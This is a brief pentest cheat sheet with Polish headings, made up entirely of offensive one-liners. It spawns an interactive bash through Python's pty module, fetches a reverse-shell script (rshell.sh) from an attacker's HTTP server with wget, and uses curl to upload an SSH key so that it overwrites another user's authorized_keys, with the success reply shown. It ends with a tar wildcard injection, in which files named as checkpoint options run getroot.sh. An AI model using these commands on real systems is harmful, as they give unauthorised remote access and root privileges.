# wywołanie powłoki 
python -c ‘import pty; pty.spawn(“/bin/bash”)’

# SimpleServ
local: python -m SimpleHTTPServer 1234 - remote: wget http://X.X.X.X:1234/rshell.sh

# wysyłanie pliku:
$ curl -X POST -H "Content-Type: multipart/form-data" -F "file=@/home/user/.ssh/id_rsa.txt" http://192.168.200.249:33414/file-upload -F filename=/home/alfredo/.ssh/authorized_keys
    {"message":"File successfully uploaded"} 

# Execute arbitrary commands:
touch ./--checkpoint=1 ./--checkpoint-action=exec=getroot.sh
